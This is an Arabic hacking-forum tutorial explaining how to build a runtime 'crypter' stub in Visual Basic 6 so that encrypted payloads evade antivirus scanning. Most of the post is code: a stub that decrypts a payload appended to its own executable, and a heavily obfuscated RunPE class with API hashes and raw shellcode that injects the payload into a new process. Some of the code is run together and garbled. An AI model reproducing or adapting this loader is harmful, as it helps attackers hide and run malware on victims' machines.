حالة الموضوع:
مغلق
  1. SaMi--DZ

    SaMi--DZ Developer

    الأنتساب:
    ‏5 أكتوبر 2011
    المشاركات:
    41
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الوظيفة:
    NoThinG
    الإقامة:
    AlGeRiA
    بسم الله الرحمن الرحيم

    السلام عليكم

    جمعة مباركة على الجميعـــ..


    اليوم نشرح طريقة التشفير الصحيح لستبات برامج التشفير

    نعرف جميعا ان الستب هو المسؤول عن التشفير

    و لكن كيف نشفر بالطريقة الصحيحة اولا علينا ان نعرف ان الستبات نوعين

    scan time و run time احن ارايحين نطبق على النوع الثاني لانه افضل

    ماذا نقصد به اي run time و هو تشفير وقت التشغيل يعني وقت فتحه

    يكون مشفر


    لناخد مثلا ستب برنامج تشفير بسيط مما سنجده متكون

    في الغالب يكون متكون من اثنين module او واحد module و واحد class


    و في كلا الحالتين نجد نطاق اسمه sub main و runpe

    طيب كيف نعرف الشيئ الغير مشفر اكيد رايح نفحص

    اذا حفظنا مباشرة لن نعرف من هو اللي مكشوف

    رايح نبسط الامور sub main اكثر شيئ رايح يكون مكشوف من حماتين

    اذا اللي لازم نشفرو هو runpe


    انا شفت في دورة التشفير الكثير من المواضيع اللي فيها اضافة runpe

    لكن المكشل لا يوجد شيئ سوى اضافة مودييول جديد كاننا لم نفعل شيئ

    كيف تريده ان يشفر و انت لم تتصل به

    نيجي لطريقة صنع ستب مشفر و اذا انكشف تستطيع اعادة تشفيره بخاصية التشفير RC4

    اول شيئ رايحين نصنع الستب فقط و برنامج التشفير رايح ارفقه في الاخير

    نفتح عمل جديد


    [​IMG]

    ولا نحذف FORM1 نخليه

    الان نضيف مودويل


    [​IMG]
    نضيف اليه هذا الكوود
    كود PHP:
    Sub Main() Dim Hello As String Dim Love() As String Dim Sami As New Class1  sFile App.Path "\" & App.EXEName & ".exe"  Open sFile For Binary As #1 Hello = Space(FileLen(sFile)) Get #1, , Hello Close #1  Love() = Split(Hello, "56XTCF8AQ2U3F11NU681J5") Love(1) = Decrypt(Love(1), "AD8TGYSS5N66UCG8162U3G")  Sami.Hi StrConv(Love(1), vbFromUnicode), App.Path & "\" & App.EXEName & ".exe" End Sub  Public Function Decrypt(sText As String, sKey As String) As String Dim I, x, y As Integer, b() As Byte, k() As Byte  Decrypt = vbNullString x = 0 b() = StrConv(sText, vbFromUnicode) k() = StrConv(sKey, vbFromUnicode) For I = 0 To Len(sText) - 1     If x = Len(sKey) - 1 Then         x = 0     Else         x = x + 1     End If         For y = 1 To 255         b(I) = b(I) Xor k(x) Mod (y + 5)     Next y Next I Decrypt = StrConv(b, vbUnicode) End Function
    نغلق و نرجع نضيف كلاسس CLASS
    و هذا المسؤول عن تشفير الستب و هو من نوع RUNPE
    و نضيف له هذا الكوود

    كود PHP:
    Option Base 0   Private Type G3u2t j0b0N                          As Long End Type Private Type n1p2y B1      As Byte:    B2      As Byte B3      As Byte:    B4      As Byte End Type Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpCode As LongOptional ByVal lParam1 As LongOptional ByVal lParam2 As LongOptional ByVal lParam3 As LongOptional ByVal lParam4 As Long) As Long Private A1C2e        As Boolean Private N3W5D(170)        As Byte Private G6k3X(255)          As Byte Private Const kernel32          As String "KERNEL32" Private Const NTDLL             As String "NTDLL" Public Function Hi(ByRef bvBuff() As ByteByVal sHost As StringOptional ByVal sParams As StringOptional ByRef hProcess As Long) As Boolean Dim K3I7i             As Long Dim c4g3Y                     As Long Dim P7p1y                    As Long Dim F8W0d               As Long Dim I                       As Long Dim u5R6c(16)        As Long Dim l0J7r(3) As Long Dim a6u4q(50)            As Long GoTo lHgYTgwLhUeBwacIdiuiCtkyIrqeQrNaoKjPtIpvOQMsnomrcUd "iSjnphG" GoTo naeDrpjByUrPVRdgvQRc naeDrpjByUrPVRdgvQRcNyuiCtkyIrqeQrNa "VnaerpjByUr" GoTo gJZsMfaOuDEC lHgYTgwLhUeBwacIdiQmeOwyTwAOZtHuhHe "FmquTuFzR" GoTo QNnCvfMPkMQfbKYxxYh GwcQYVbLSaqQQgQaNNpxJmFlIbnbZS "iEoEBMefA" GoTo QqSxvdRmdThsbaNNpxJm VpUsKkKVPiRoYjNyuiCtkyIrqeQrNa "VnaerpjByUr" GoTo kwNckluSMqsZf smtQkjzDGxQmeOwyTQmeOwyTwAOZtHuhHe "FmquTuFzR" GoTo gLTUSYvCJoAAP lIbnbZSliEozEBMe: GoTo ABKjPtIpvOQsnomrcUdGiSjnphGjN gJZsMfaOuDECVRdgvQRclgJZsMfaOuD "CHsmtQkzDG" GoTo smtQkjzDGxQmeOwyT QNnCvfMPkMQfbKYxxYhVRdgvQRclgJZsMfaOuD "CHsmtQkzDG" GoTo VpUsKkKVPiRoYj kwNckluSMqsZfKjPtIpvOQMsnomrcUd "iSjnphG" GoTo GwcQYVbLSaqQQgQ ABKjPtIpvOQsnomrcUdGiSjnphGjNaNNpxJmFlIbnbZS "iEoEBMefA" GoTo uiCtkyIrqeQrNao QqSxvdRmdThsbaNNpxJmK3I7i VarPtr(bvBuff(0)) GoTo lIbnbZSliEozEBMe gLTUSYvCJoAAP: If Not GetNumb(K3I7i2) = &H5A4D Then Exit Function GoTo rqeQrNaoVnaeDrpjBqeQrNaoVnaeDrjByUrPVRdgvQRlgJZsMfaOuyGwcQYVbLSaqQQg "ZQqSxvdRmdhsbaNNpxJ" GoTo ECHsmtQkjzDGxQmewyTwAOZtHuhHedFmEq PkMQfbKYxxYhtVpUsKKVPiRoYjokwNLTUSYvCJoAAPTQN "CvfMkMQfbKYxx" GoTo kluSMqsZfywcQYVbLSaqQQgQZQq rqeQrNaoVnaeDrpjBOQMsnomrcUdGiSjnp "GjNuiCtky" GoTo MfaOuDECHsmtQ kluSMqsZfywcQYVbLSaqQQgQZQqc4g3Y K3I7i GetNumb(K3I7i + &H3C) GoTo xvdRmdThsbaNNpxJmFl ECHsmtQkjzDGxQmewyTwAOZtHuhHedFmEqFlIbnbZSliEozEBM "fAKjPtIp" GoTo TuFzROlHgYTgwLUeBwacIdiqgTUSYvCJoAAPTQNnCvfPkMQfbKYxxYhtVpUsK jPtIpvOQMsnomrcUdiSjnphGjNyuiCtkyIhtVpUsKkKVPiRoYjokwN "klSMqsZ" GoTo qeQrNaoVnaeDrjByUrPVRdgvQRlgJZsMfaOu xvdRmdThsbaNNpxJmFl: GoTo bnbZSliEozEBMefAB jzDGxQmeOwyTAOZtHuhHedFmEqyGwcQYVbLSaqQQg "ZQqSxvdRmdhsbaNNpxJ" GoTo TuFzROlHgYTgwLUeBwacIdiqgTUSYvCJoAAPTQNnCvf MfaOuDECHsmtQFlIbnbZSliEozEBM "fAKjPtIp" GoTo jzDGxQmeOwyTAOZtHuhHedFmEq bnbZSliEozEBMefABLTUSYvCJoAAPTQN "CvfMkMQfbKYxx" GoTo jPtIpvOQMsnomrcUdiSjnphGjNyuiCtkyI TuFzROlHgYTgwLUeBwacIdiqgTUSYvCJoAAPTQNnCvfhtVpUsKkKVPiRoYjokwN "klSMqsZ" GoTo PkMQfbKYxxYhtVpUsKKVPiRoYjokwN TuFzROlHgYTgwLUeBwacIdiqgTUSYvCJoAAPTQNnCvfPkMQfbKYxxYhtVpUsKOQMsnomrcUdGiSjnp "GjNuiCtky" GoTo UrPVRdgvQRclgJZ UrPVRdgvQRclgJZ: If Not GetNumb(c4g3Y) = &H4550 Then Exit Function GoTo eBwacIdiqgLTUSYvCJoAkluSMqsZfywcQYVbLSaqQQgQZQqxvdRmdThsbaNNpxJmFlbnbZSliEozEBMefABnomrcUdGiSjnphGjNuiCtkyIrqeQrNaoVn "eDpjByU" GoTo jPtIpvOQMsnomrcUdiSjnphGjNyuiCtkyIqeQrNaoVnaeDr jByUrPVRdgvQRlgJZsMfaOuECHsmtQkjzDGxQmeu5R6c(0) = &H44 GoTo wyTwAOZtHuhHedFmEqTuFzROlHgYTgwL eBwacIdiqgLTUSYvCJoAxQmeOwyTwAOZtHuhHe "FmquTuFzRlHgYTgwLh" GoTo YxxYhtVpUsKkKVPiR wyTwAOZtHuhHedFmEqTuFzROlHgYTgwLCall Q7G3G(kernel32, &H16B3FE88StrPtr(sHost), StrPtr(sParams), 000, &H400VarPtr(u5R6c(0)), VarPtr(l0J7r(0))) GoTo UeBwacIdiqgTUSYvCJoAAPTQNnCvfPkMQfbKYxxYhtVpUsKKVPiRoYjokwN jPtIpvOQMsnomrcUdiSjnphGjNyuiCtkyIqeQrNaoVnaeDrPVRdgvQRclgJZsMfa "uDECHsmtQjzD" GoTo jByUrPVRdgvQRlgJZsMfaOuECHsmtQkjzDGxQmewyTwAOZtHuhHedFmEqTuFzROlHgYTgwL kluSMqsZfywcQYVbLSaqQQgQZQqxvdRmdThsbaNNpxJmFlCall Q7G3G(NTDLL, &HD33BCABDl0J7r(0), VarPtr(F8W0d), 0VarPtr(GetNumb(c4g3Y + &H50)), &H3000, &H40) GoTo bnbZSliEozEBMefABjPtIpvOQMsnomrcUd iSjnphGjNyuiCtkyIqeQrNaoVnaeDr: GoTo jByUrPVRdgvQRlgJZsMfaOuECHsmtQkjzDGxQmewyTwAOZtHuhHedFmEq GjNyuiCtkyIqeQrNaoVnaeDrF8W0d GetNumb(c4g3Y + &H34) GoTo jByUrPVRdgvQRlgJZsMfaOuECHsmtQkjzDGxQme YjokwNckluSMqnomrcUdGiSjnphGjNuiCtkyIrqeQrNaoVn "eDpjByU" GoTo ZfyGwcQYVbLSaqQgQZQqSxvdRmdThsbaNpxJmFlIbnbZSliEozE jByUrPVRdgvQRlgJZsMfaOuECHsmtQkjzDGxQmewyTwAOZtHuhHedFmEqQgQZQqSxvdRmdThsbaNN "xJmFIbn" GoTo TuFzROlHgYTgwLUeBwacIdiqgTUSYvCJoAAPTQNnCvfPkMQfbKYxxYhtVpUsKKVPiRoYjokwN TuFzROlHgYTgwLUeBwacIdiqgTUSYvCJoAAPTQNnCvfPkMQfbKYxxYhtVpUsKKVPiRoYjokwNZSliEozEBMefABK "PtIvOQM" GoTo kluSMqsZfywcQYVbLSaqQQgQZQqxvdRmdThsbaNNpxJmFlbnbZSliEozEBMefAB MefABKjPtIpvOQMnomrcUdGiSjnpQgQZQqSxvdRmdThsbaNN "xJmFIbn" GoTo GjNyuiCtkyIqeQrNaoVnaeDr UeBwacIdiqgTUSYvCJoAAPTQNnCvfPkMQfbKYxxYhtVpUsKKVPiRoYjokwNCall Q7G3G(NTDLL, &HF21037D0l0J7r(0), F8W0d) GoTo kluSMqsZfywcQYVbLSaqQQgQZQqxvdRmdThsbaNNpxJmFl YxxYhtVpUsKkKVPiRPVRdgvQRclgJZsMfa "uDECHsmtQjzD" GoTo YjokwNckluSMq bnbZSliEozEBMefABjPtIpvOQMsnomrcUdCall Q7G3G(NTDLL, &HC5108CC2l0J7r(0), F8W0dVarPtr(bvBuff(0)), GetNumb(c4g3Y + &H54), 0) GoTo iSjnphGjNyuiCtkyIqeQrNaoVnaeDr jByUrPVRdgvQRlgJZsMfaOuECHsmtQkjzDGxQmewyTwAOZtHuhHedFmEqTuFzROlHgYTgwLxQmeOwyTwAOZtHuhHe "FmquTuFzRlHgYTgwLh" GoTo PTQNnCvfMPkMQfb ZfyGwcQYVbLSaqQgQZQqSxvdRmdThsbaNpxJmFlIbnbZSliEozEZSliEozEBMefABK "PtIvOQM" GoTo MefABKjPtIpvOQMnomrcUdGiSjnp PTQNnCvfMPkMQfb: For 0 To GetNumb(c4g3Y + &H62) - GoTo eBwacIdiqgLTUSYvCJoAPTQNnCvfMPkMQfbYvNnNZSlUrbmro: GoTo QfnoxVQtvciBJzf cTtVAyhUpgyuiCtkyIrqeQrNaoVna "DrjByUPVRdg" GoTo lveeQQsANpIoMeqecVol jByUrPVRdgvQRlgJZsMfaOuECHsmtQkjzDGxQmezCQzDRcxKxkLhgIqHtxiEozEBMefABKjPtI "vOQMnomrcdGiSjnphGj" GoTo xICURpKjbYjAOkYhFzdf QfnoxVQtvciBJzfqSxvdRmdThsbaNNpxJmF "IbnZS" GoTo bZeOVdtUTk rCIEPhiDEOmSwLszRwyTwAOZtHuhHedFmEqu "uFzROlHgYTwLh" GoTo YxxYhtVpUsKkKVPiRYjokwNckluSMq ZfyGwcQYVbLSaqQgQZQqSxvdRmdThsbaNpxJmFlIbnbZSliEozEMefABKjPtIpvOQMQRclgJZsMfaOuDECH "mtQkjDGxQme" GoTo nomrcUdGiSjnpGjNyuiCtkyIqeQrNaoVnaeDr nomrcUdGiSjnpGjNyuiCtkyIqeQrNaoVnaeDryuiCtkyIrqeQrNaoVna "DrjByUPVRdg" GoTo jByUrPVRdgvQRlgJZsMfaOuECHsmtQkjzDGxQmezCQzDRcxKxkLhgIqHtx xICURpKjbYjAOkYhFzdfqSxvdRmdThsbaNNpxJmF "IbnZS" GoTo gltjOYYQbyFMrDDTQa eBwacIdiqgLTUSYvCJoAPTQNnCvfMPkMQfbwyTwAOZtHuhHedFmEqu "uFzROlHgYTwLh" GoTo ZfyGwcQYVbLSaqQgQZQqSxvdRmdThsbaNpxJmFlIbnbZSliEozEMefABKjPtIpvOQM bZeOVdtUTkiEozEBMefABKjPtI "vOQMnomrcdGiSjnphGj" GoTo cTtVAyhUpg lveeQQsANpIoMeqecVolQRclgJZsMfaOuDECH "mtQkjDGxQme" GoTo rCIEPhiDEOmSwLszR gltjOYYQbyFMrDDTQaP7p1y c4g3Y + &HF8 + (&H28 I) GoTo qFyiPSnPTifNbAAckwZ qFyiPSnPTifNbAAckwZCall Q7G3G(NTDLL, &HC5108CC2l0J7r(0), F8W0d GetNumb(P7p1y + &HC), K3I7i GetNumb(P7p1y + &H14), GetNumb(P7p1y + &H10), 0) GoTo YvNnNZSlUrbmro YxxYhtVpUsKkKVPiRYjokwNckluSMqNext I GoTo noxVQtvciBJfabZeOVdtUTkacTqFyiPSnPTifNbAAckwZYvNnNZSlUrbmroZUgkyTUfojMdvPjdSyHH "Kwpwbnn" GoTo QfnoxVQtvciBJzfbZeOVdtUTk QfnoxVQtvciBJzfbZeOVdtUTkGJBapiRzCQzDRcxKxk "hgIqHtxQ" GoTo cTtVAyhUpglveeQQsANpIoMeqecVol PvqrpufZgJVmqtkJmRBxlGGJBapiRzCQzDRcxKxk "hgIqHtxQ" GoTo nBLuuhTuQesZrdGvsmEBYuSZU ANpIoMeqecVolrCIEPhiDEOmSwLszRICURpKjbYjAOkYhFzfLgltjOYYQbyFMr "DTQaRqF" GoTo PvqrpufZgJVmqtkJmRBxlG YvNnNZSlUrbmroQfnoxVQtvciBJzfa6u4q(44) = F8W0d GetNumb(c4g3Y + &H28) GoTo bZeOVdtUTkcTtVAyhUpg bZeOVdtUTkcTtVAyhUpgCall Q7G3G(NTDLL, &H6935E395l0J7r(1), VarPtr(a6u4q(0))) GoTo lveeQQsANpIoMeqecVolrCIEPhiDEOmSwLszR lveeQQsANpIoMeqecVolrCIEPhiDEOmSwLszRCall Q7G3G(NTDLL, &HC54A46C8l0J7r(1), 0) GoTo PvqrpufZgJVmqtkJmRBxlGnBLuuhTuQesZrd rCIEPhiDEOmSwLszRPvqrpufZgJiPSnPTifNbAAckwZs "vNnNZSlUrbrozQ" GoTo VAyhUpgQlveeQQ gltjOYYQbyFMrDDTQaqFyiPSnPTifNbAAckwZCall Q7G3G(NTDLL, &HC5108CC2l0J7r(0), a6u4q(41) + &H8VarPtr(F8W0d), &H40) GoTo YvNnNZSlUrbmroQfnoxVQtvciBJzf nCGJBapiRzCQa6u4q(0) = &H10007 GoTo DRcxKxkLhgIqHtxxICURpKjbYjAOkYhFzdf cTtVAyhUpglveeQQsANpIoMeqecVolICURpKjbYjAOkYhFzfLgltjOYYQbyFMr "DTQaRqF" GoTo rCIEPhiDEOmSwLszRPvqrpufZgJ GvsmEBYuSZUkyTUfojMdvPRunPE True GoTo dSyHHFKwpwbnCGJBapiRzCQ dSyHHFKwpwbnCGJBapiRzCQ: GoTo DRcxKxkLhgIqHtxxICURpKjbYjAOkYhFzdfgltjOYYQbyFMrDDTQa DRcxKxkLhgIqHtxxICURpKjbYjAOkYhFzdfCall Q7G3G(NTDLL, &HE935E393l0J7r(1), VarPtr(a6u4q(0))) GoTo gltjOYYQbyFMrDDTQaqFyiPSnPTifNbAAckwZ DRcxKxkLhgIqHtxxICURpKjbYjAOkYhFzdfgltjOYYQbyFMrDDTQawnBLuuhTuQesZrdhGv "mEBYu" GoTo qFyiPSnPTifNbAAckwZYvNnNZSlUrbmro kyTUfojMdvPdSyHHFKwpwbwnBLuuhTuQesZrdhGv "mEBYu" GoTo nCGJBapiRzCQ PvqrpufZgJVmqtkJmRBxlGnBLuuhTuQesZrdhProcess l0J7r(0) GoTo GvsmEBYuSZUkyTUfojMdvP nBLuuhTuQesZrdGvsmEBYuSZUZUgkyTUfojMdvPjdSyHH "Kwpwbnn" GoTo kyTUfojMdvPdSyHHFKwpwb noxVQtvciBJfabZeOVdtUTkacTiPSnPTifNbAAckwZs "vNnNZSlUrbrozQ" GoTo ANpIoMeqecVolrCIEPhiDEOmSwLszR VAyhUpgQlveeQQEnd Function Private Function GetNumb(ByVal lPtr As LongOptional ByVal lSize As Long = &H4) As Long GoTo PhiDEOmSwLszRaPvrpufZgJlVmqtknCGJBapiRzCQDRcxKxkLhgIqHtxxICURpKjbYjAOkYhFzdf: GoTo gltjOYYQbyFMrDDTQaqFyiPSnPTifNbAAckwZYvNnNZSlUrbmroQfnoxVQtvciBJzf PvqrpufZgJVmqtkJmRBxlGnBLuuhTuQesZrdGvsmEBYuSZUkyTUfojMdvPtjOYYQbyFMrDDTQaqFyiPSnPTifNbAAckwZs "vNnNZSlUrbrozQnox" GoTo dSyHHFKwpwbnCGJBapiRzCQDRcxKxkLhgIqHtxxICURpKjbYjAOkYhFzdf QfnoxVQtvciBJzfbZeOVdtUTkcTtVAyhUpglveeQQsANpIoMeqecVoltxQxICURpKjbYjAOkY "FzdLg" GoTo rCIEPhiDEOmSwLszRPvqrpufZgJVmqtkJmRBxlGnBLuuhTuQesZrd gltjOYYQbyFMrDDTQaqFyiPSnPTifNbAAckwZYvNnNZSlUrbmroQfnoxVQtvciBJzfbnnCGJBapiRzCQzDR "xKkLhgIq" GoTo bZeOVdtUTkcTtVAyhUpglveeQQsANpIoMeqecVolrCIEPhiDEOmSwLszR gltjOYYQbyFMrDDTQaqFyiPSnPTifNbAAckwZYvNnNZSlUrbmroQfnoxVQtvciBJzfbZeOVdtUTkgQlveeQQsANpIoMe "ecVoHrCI" GoTo mRBxlGwnBLuuhTuQeZrdhGvsmEBYuS UgkyTUfojMdvPjdSyHHFwpwbnnCGJBapiRzCQQtvciBJzfabZeOVdtUTk "cTVAyhU" GoTo DRcxKxkLhgIqHtxxICURpKjbYjAOkYhFzdfgltjOYYQbyFMrDDTQaqFyiPSnPTifNbAAckwZYvNnNZSlUrbmro DRcxKxkLhgIqHtxxICURpKjbYjAOkYhFzdfgltjOYYQbyFMrDDTQaqFyiPSnPTifNbAAckwZYvNnNZSlUrbmrotjOYYQbyFMrDDTQaqFyiPSnPTifNbAAckwZs "vNnNZSlUrbrozQnox" GoTo QfnoxVQtvciBJzfbZeOVdtUTkcTtVAyhUpglveeQQsANpIoMeqecVol rCIEPhiDEOmSwLszRPvqrpufZgJVmqtkJmRBxlGnBLuuhTuQesZrdbnnCGJBapiRzCQzDR "xKkLhgIq" GoTo GvsmEBYuSZUkyTUfojMdvPdSyHHFKwpwb PhiDEOmSwLszRaPvrpufZgJlVmqtkgQlveeQQsANpIoMe "ecVoHrCI" GoTo UgkyTUfojMdvPjdSyHHFwpwbnnCGJBapiRzCQ bZeOVdtUTkcTtVAyhUpglveeQQsANpIoMeqecVolrCIEPhiDEOmSwLszRtxQxICURpKjbYjAOkY "FzdLg" GoTo PvqrpufZgJVmqtkJmRBxlGnBLuuhTuQesZrdGvsmEBYuSZUkyTUfojMdvP GvsmEBYuSZUkyTUfojMdvPdSyHHFKwpwbCall Q7G3G(NTDLL, &HC5108CC2, -1VarPtr(GetNumb), lPtrlSize0) GoTo nCGJBapiRzCQDRcxKxkLhgIqHtxxICURpKjbYjAOkYhFzdf dSyHHFKwpwbnCGJBapiRzCQDRcxKxkLhgIqHtxxICURpKjbYjAOkYhFzdfQtvciBJzfabZeOVdtUTk "cTVAyhU" GoTo gltjOYYQbyFMrDDTQaqFyiPSnPTifNbAAckwZYvNnNZSlUrbmroQfnoxVQtvciBJzfbZeOVdtUTk mRBxlGwnBLuuhTuQeZrdhGvsmEBYuSEnd Function Public Function Q7G3G(ByVal E2V3c As StringByVal a5v0I As LongParamArray vParams() As Variant) As Long Dim Z1j0f                   As Variant Dim e8F8a                   As n1p2y Dim P3O3E                    As Long Dim I                       As Long Dim w                       As Long If Not A1C2e Then For 0 To 170 N3W5D(I) = CByte(Choose(1, &HE8, &H22, &H0, &H0, &H0, &H68, &HA4, &H4E, &HE, &HEC, &H50, &HE8, &H43, &H0, &H0, &H0, &H83, &HC4, &H8, &HFF, &H74, &H24, &H4, &HFF, &HD0, &HFF, &H74, &H24, &H8, &H50, &HE8, &H30, &H0, &H0, &H0, &H83, &HC4, &H8, &HC3, &H56, &H55, &H31, &HC0, &H64, &H8B, &H70, &H30, &H8B, &H76, &HC, &H8B, &H76, &H1C, &H8B, &H6E, &H8, &H8B, &H7E, &H20, &H8B, &H36, &H38, &H47, &H18, &H75, &HF3, &H80, &H3F, &H6B, &H74, &H7, &H80, &H3F, &H4B, &H74, &H2, &HEB, &HE7, &H89, &HE8, &H5D, &H5E, &HC3, &H55, &H52, &H51&H53, &H56, &H57, &H8B, &H6C, &H24, &H1C, &H85, &HED, &H74, &H43, &H8B, &H45, &H3C, &H8B, &H54, &H5, &H78, &H1, &HEA, &H8B, &H4A, &H18, &H8B, &H5A, &H20, &H1, &HEB, &HE3, &H30, &H49, &H8B, &H34, &H8B, &H1, &HEE, &H31, &HFF, &H31, &HC0, &HFC, &HAC, &H84, &HC0, &H74, &H7, &HC1, &HCF, &HD, &H1, &HC7, &HEB, &HF4, &H3B, &H7C, &H24, &H20, &H75, &HE1, &H8B, &H5A, &H24, &H1, &HEB, &H66, &H8B, &HC, &H4B, &H8B, &H5A, &H1C, &H1, &HEB, &H8B, &H4, &H8B, &H1, &HE8, &H5F, &H5E, &H5B, &H59, &H5A, &H5D, &HC3)) Next I GoTo wyHfaDFmsLTIokjoZgnDedtjmIqfzqhuEnnbbBKQzSVoAolfxuRBLRNaqPUFyFkxwMQSKkyrcJLgI "bmGTHtUrRzQChHSMfcy" GoTo MOYvdGVCIckaFAzEpipTugwzCuSw MfcyUtlhsJZuirOJnpVA1C2e True GoTo vDsYhiglIOVAN dhjbAPHsacwZesoQkJpipTugwzCuSwbKGvPG "KUEDrdbnBjAmq" GoTo luGiChFYxYjdveBlvxJapwyHfaDFmsLTokkjoZgnDedtjmeCg MOYvdGVCIckaFAzEpipTugwzCuSwtlhsJZuirOJnpVpvDsYh "glIVANMdhjbA" GoTo KGvPGxKUEDdEbnBjAmqQECwLiDcieqtIefoytQmEZ yFkxwMQSKkyrcJLgNbmGTHtUrqRzQCGhHGoTo MfcyUtlhsJZuirOJnpV wbKGvPGxKUEDrdEbnBjPUFyFkxwMQSKkyrcJLgI "bmGTHtUrRzQChHSMfcy" GoTo mqQECwOLiDcieqt wyHfaDFmsLTIokjoZgnDedtjmHsacwZesoQkJKluGiCh "YxYjdvelvBxJa" GoTo uRBLRNaqrMOYvdGCIckaFAAzEpipTugwzCu KGvPGxKUEDdEbnBjAmqQECwLiDcieqtIefoytQmEZHsacwZesoQkJKluGiCh "YxYjdvelvBxJa" GoTo CgKIqfzqhunnbbBKQzSyVoAolf vDsYhiglIOVAN: GoTo dhjbAPHsacwZesoQkJ luGiChFYxYjdveBlvxJapwyHfaDFmsLTokkjoZgnDedtjmeCgECwOLiDcieqtIefoytQ "EZsnHQ" GoTo IqfzqhuEnnbbBKQzSVoAolfxuRBLRNaq mqQECwOLiDcieqtECwOLiDcieqtIefoytQ "EZsnHQ" GoTo efoytQmEZsncHQRPU efoytQmEZsncHQRPUpipTugwzCuSwbKGvPG "KUEDrdbnBjAmq" GoTo yFkxwMQSKkyrcJLgNbmGTHtUrqRzQCGhH uRBLRNaqrMOYvdGCIckaFAAzEpipTugwzCutlhsJZuirOJnpVpvDsYh "glIVANMdhjbA" GoTo wbKGvPGxKUEDrdEbnBj CgKIqfzqhunnbbBKQzSyVoAolfEnd If P3O3E CallWindowProcW(VarPtr(N3W5D(0)), StrPtr(E2V3c), a5v0I) If P3O3E Then For UBound(vParamsTo LBound(vParamsStep -GoTo mFlIbAbmgyiEoyEAMmFlIbAbmgyiEoyEAMDQPgkneDSLvdfAd "vraNNox" GoTo NLtiCtkxHrqe xluRMqsZtyvckljoLSaDQPgkneCall o8a0m(e8F8a.B3I):  Call o8a0m(e8F8a.B4I) GoTo SLvdfAdhvraoNNox FNaCVBZrDrjByUEPURduvQRufMOjLQfpJQKxYutVC "GKkKVPifBY" GoTo zgJZFLfndIECHslsQxjzDFxQze MOjLQfpJQKxutVCTGKkKVPifBYwokwMCall o8a0m(e8F8a.B1I):  Call o8a0m(e8F8a.B2I) GoTo xluRMqsZtyvckljoLSaDQPgkne THFzROlHglitwLe8F8a o3D0n(CLng(vParams(w))) GoTo irBwapIcvqfTUSYIBJnAzPTVNnCu mFlIbAbmgyiEoyEAMszBKidGIpvOJySJANZHGugHeq "mDptTHFROlHgl" GoTo QMsnomrcjqGhhwmphFNLtiCtkxHrqe JySJANZHGugHeqEmDpOJySJANZHGugHeq "mDptTHFROlHgl" GoTo THFzROlHglitwL ECHslsQxjzDFxQzeJySJANZHGugHeqEmDpokwMcxluRMqsZtyGv "kloLS" GoTo THFzROlHglitwLirBwapIcvqf irBwapIcvqfTUSYIBJnAzPTVNnCuCall o8a0m(&H68I) GoTo MOjLQfpJQKxutVCTGKkKVPifBYwokwM SLvdfAdhvraoNNox: GoTo mFlIbAbmgyiEoyEAMszBKidGIpv NLtiCtkxHrqeokwMcxluRMqsZtyGv "kloLS" GoTo FNaCVBZrDrjByUEPURduvQR zgJZFLfndIECHslsQxjzDFxQzetwLhirBwapIcvqf "TUSYIBJnzPTVNn" GoTo JySJANZHGugHeqEmDp FNaCVBZrDrjByUEPURduvQRzgJZFLfndIufMOjLQfpJQKxYutVC "GKkKVPifBY" GoTo ECHslsQxjzDFxQzeJySJANZHGugHeqEmDp THFzROlHglitwLirBwapIcvqfDQPgkneDSLvdfAd "vraNNox" GoTo szBKidGIpvQMsnomrcjqGhhwmphF QMsnomrcjqGhhwmphFNLtiCtkxHrqetwLhirBwapIcvqf "TUSYIBJnzPTVNn" GoTo FNaCVBZrDrjByUEPURduvQRzgJZFLfndI szBKidGIpvQMsnomrcjqGhhwmphFNext w GoTo ROlHglitwLhirBwpIcvqfKTUSFlIbAbmgyiEoEAMdszBKidGIpvOMsnomrcjqGhhwmphFjNLiCtkxHrqeeFNaCCall o8a0m(&HFFI):      Call o8a0m(&HD0I) GoTo BZrDrpjByUEPURduvQRbgJZFLfndIDECHslQxjzDFxQzeOJyS ANZHGugHeqEmDptTHzROlHglitwLhirBwpIcvqfKTUS: GoTo IBJnAzPTVNnCufMOjLQfJQKxYutVCTGKkVPifBYwokwMcxluRMsZtyGvckljoLS zROlHglitwLhirBwpIcvqfKTUSIBJnAzPTVNnCuiPSnPTiJZFLfndIDECHslsxjzDFxQzeOJySJANZHGu "HeqmDptTHF" GoTo IBJnAzPTVNnCufMOjLQfJQKxYutVCTGKk iCtkxHrqeeFNaCBZrDrpjByUEPURduvQRbgJZFLfndIDECHslYwokwMcxluRMqsZtyG "ckljoSaDQPgkn" GoTo QxjzDFxQzeOJySANZHGugHeqEmDptTH VPifBYwokwMcxluRMsZtyGvckljoLSnomrcjqGhhwmphFjNtiCtkxHrqeeFNaCVBZr "rpjByUEURduvQRbz" GoTo DQPgkneDSLdfAdhvraoNNoxJ DQPgkneDSLdfAdhvraoNNoxJmgyiEoyEAMdszBK "dGIvOQM" GoTo FlIbAbmgyiEoEAMdszBKidGIpvOMsnomrcjqGhhwmphFjNL sZtyGvckljoLSDQPgkneDSLdfAdhvraoNNoxJCall o8a0m(e8F8a.B3I):  Call o8a0m(e8F8a.B4I) GoTo FlIbAbmgyiEoEAMdszBKidGIpvOMsnomrcjqGhhwmphFjNLiCtkxHrqeeFNaC gJZFLfndIDECHslQxjzDFxQzeOJySANZHGugHeqEmDptTHnomrcjqGhhwmphFjNtiCtkxHrqeeFNaCVBZr "rpjByUEURduvQRbz" GoTo zROlHglitwLhirBwpIcvqfKTUSIBJnAzPTVNnCuiPSnPTi BZrDrpjByUEPURduvQRbgJZFLfndIDECHslQxjzDFxQzeOJySCall o8a0m(&HC3I) GoTo ANZHGugHeqEmDptTHzROlHglitwLhirBwpIcvqfKTUS IBJnAzPTVNnCufMOjLQfJQKxYutVCTGKkVPifBYwokwMcxluRMCall o8a0m(e8F8a.B1I):  Call o8a0m(e8F8a.B2I) GoTo sZtyGvckljoLSDQPgkneDSLdfAdhvraoNNoxJ IBJnAzPTVNnCufMOjLQfJQKxYutVCTGKkVPifBYwokwMcxluRMsZtyGvckljoLSYwokwMcxluRMqsZtyG "ckljoSaDQPgkn" GoTo DQPgkneDSLdfAdhvraoNNoxJFlIbAbmgyiEo FlIbAbmgyiEoEAMdszBKidGIpvOMsnomrcjqGhhwmphFjNLDSLvdfAdhvraoNN "xJmFIbA" GoTo iCtkxHrqeeFNaCBZrDrpjByUEPURduvQRbgJZFLfndIDECHsl ROlHglitwLhirBwpIcvqfKTUSJZFLfndIDECHslsxjzDFxQzeOJySJANZHGu "HeqmDptTHF" GoTo VPifBYwokwMcxluRMsZtyGvckljoLS 